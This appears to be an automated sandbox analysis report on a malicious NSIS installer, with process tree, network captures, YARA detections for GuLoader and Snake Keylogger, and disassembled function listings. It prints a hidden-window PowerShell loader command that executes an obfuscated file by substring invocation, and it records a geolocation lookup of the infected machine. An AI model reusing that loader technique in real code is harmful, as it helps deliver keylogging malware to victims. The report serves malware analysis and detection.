2024-12-19 09:30:29 UTC	874	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589398 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B12SMu5C06hdMjkPHxN6BBKrKHmwFvl0N6udGn1aMz89w50sZsxni9d557KVAFHnxrZjOv0VeC24wYTgOz%2FpoPZVfjrGIe57IIvqwuLto3atxDzGrjYWX8mvGUftkFxiqZ3ZldoB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465fd01f99425f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1812538&cwnd=216&unsent_bytes=0&cid=ebf41a0410034bd7&ts=451&x=0"
2024-12-19 09:30:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49722	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 09:30:32 UTC	880	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589401 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFbsmMR7cm5J2SRvuHPM88Ak4Sorr3l%2BVi1vRBGDQz7JpBSjrHT7nHMlRkDBv0yIsSKDAw%2FGn0%2FxgKB0JayINICnUPD2PiXPCj4edn2IMsianMoNwe8RsIN%2BRQ%2Fi875Yzj8hHS4J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465fe2c80c41de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1830721&cwnd=225&unsent_bytes=0&cid=eda2fb87d1c8bf41&ts=448&x=0"
2024-12-19 09:30:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	04:28:28
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\Overheaped237.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Overheaped237.exe"
Imagebase:	0x400000
File size:	587'656 bytes
MD5 hash:	8F4ADFD3B8C55670A99389BA3905E43D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:28:29
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "
Imagebase:	0x860000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2079055968.000000000CA7F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:28:29
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:29:33
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x610000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.7%
Total number of Nodes:	1276
Total number of Limit Nodes:	37

Executed Functions

Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403250
GetVersion.KERNEL32 ref: 00403256
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
#17.COMCTL32(00000007,00000009), ref: 004032A1
OleInitialize.OLE32(00000000), ref: 004032A8
SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Overheaped237.exe",00000000), ref: 004032EC
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Overheaped237.exe",00000020), ref: 00403317
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 00403414
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403425
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403431
GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403445
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040344D
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040345E
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403466
DeleteFileA.KERNELBASE(1033), ref: 0040347A

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

ExitProcess.KERNEL32(?), ref: 00403523
CoUninitialize.COMBASE(?), ref: 00403528
ExitProcess.KERNEL32 ref: 00403549
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
ExitProcess.KERNEL32 ref: 004036EB

Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4

Strings

TMP, xrefs: 00403461
NSIS Error, xrefs: 004032CA
", xrefs: 0040333C
error, xrefs: 004035BB
1033, xrefs: 00403475
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004033F9, 004034FA, 004035A4, 004035AD
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403409, 0040340E, 00403424, 00403430, 0040343F, 0040344C, 00403458, 00403460, 00403559, 0040356A, 00403575, 00403581, 0040358E, 0040359D, 0040364C
C:\Users\user\Desktop, xrefs: 0040357B, 00403580, 004035AC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040323F
TEMP, xrefs: 00403459
C:\Users\user\Desktop\Overheaped237.exe, xrefs: 00403606
\Temp, xrefs: 0040342B
UXTHEME, xrefs: 00403273, 00403278, 0040327E
Low, xrefs: 00403447
Error launching installer, xrefs: 004034E0
~nsu, xrefs: 00403554
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 004032DF, 004032E5, 0040349E
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253, xrefs: 00403505
.tmp, xrefs: 00403570
SeShutdownPrivilege, xrefs: 0040367F

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\Overheaped237.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253$C:\Users\user\Desktop$C:\Users\user\Desktop\Overheaped237.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$error$~nsu
API String ID: 3329125770-1379043838
Opcode ID: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
Opcode Fuzzy Hash: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E

Function 004051BA Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405219
GetDlgItem.USER32(?,000003EE), ref: 00405228
GetClientRect.USER32(?,?), ref: 00405265
GetSystemMetrics.USER32(00000002), ref: 0040526C
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
ShowWindow.USER32(?,00000008), ref: 00405308
GetDlgItem.USER32(?,000003EC), ref: 00405329
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
GetDlgItem.USER32(?,000003F8), ref: 00405237

Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

GetDlgItem.USER32(?,000003EC), ref: 0040537A
CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
CloseHandle.KERNELBASE(00000000), ref: 0040538F
ShowWindow.USER32(00000000), ref: 004053B2
ShowWindow.USER32(?,00000008), ref: 004053B9
ShowWindow.USER32(00000008), ref: 004053FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
CreatePopupMenu.USER32 ref: 00405444
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
GetWindowRect.USER32(?,000000FF), ref: 00405479
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
OpenClipboard.USER32(00000000), ref: 004054DE
EmptyClipboard.USER32 ref: 004054E4
GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
GlobalLock.KERNEL32(00000000), ref: 004054F7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
GlobalUnlock.KERNEL32(00000000), ref: 00405524
SetClipboardData.USER32(00000001,00000000), ref: 0040552F
CloseClipboard.USER32 ref: 00405535

Strings

aP, xrefs: 00405409
shovelhead Setup: Completed, xrefs: 004054AA

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: shovelhead Setup: Completed$aP
API String ID: 590372296-2099456663
Opcode ID: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction ID: 22ae5336f142fb48a9cf727d400d9a9d64ef180589f118636d3b9fd0a83d5397
Opcode Fuzzy Hash: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction Fuzzy Hash: 0FA147B1900208BFDB119FA0DD89EAE7BB9FB08355F00407AFA05B61A0C7B55E51DF69

Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,771B3410,771B2EE0,00000000), ref: 0040572E
lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 00405776
lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 00405797
lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 0040579D
FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 004057AE
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
FindClose.KERNEL32(00000000), ref: 0040586C

Strings

\*.*, xrefs: 00405770
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 00405705
8B, xrefs: 0040575E

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Overheaped237.exe"$8B$\*.*
API String ID: 2035342205-2102380107
Opcode ID: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
Opcode Fuzzy Hash: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253
API String ID: 123533781-477239222
Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54

Function 004064AE Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44

Function 00406167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(771B3410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0), ref: 00406172
FindClose.KERNEL32(00000000), ref: 0040617E

Strings

C:\, xrefs: 00406167

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED

Function 00403B75 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
ShowWindow.USER32(?), ref: 00403BCE
DestroyWindow.USER32 ref: 00403BE2
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
GetDlgItem.USER32(?,?), ref: 00403C1F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
IsWindowEnabled.USER32(00000000), ref: 00403C3A
GetDlgItem.USER32(?,00000001), ref: 00403CE8
GetDlgItem.USER32(?,00000002), ref: 00403CF2
SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
GetDlgItem.USER32(?,00000003), ref: 00403E03
ShowWindow.USER32(00000000,?), ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
EnableWindow.USER32(?,?), ref: 00403E51
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
EnableMenuItem.USER32(00000000), ref: 00403E6E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
lstrlenA.KERNEL32(shovelhead Setup: Completed,?,shovelhead Setup: Completed,00422F20), ref: 00403EC2
SetWindowTextA.USER32(?,shovelhead Setup: Completed), ref: 00403ED1
ShowWindow.USER32(?,0000000A), ref: 00404005

Strings

aP, xrefs: 00403F1F
shovelhead Setup: Completed, xrefs: 00403EAE, 00403EB8, 00403EC1, 00403ECF

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

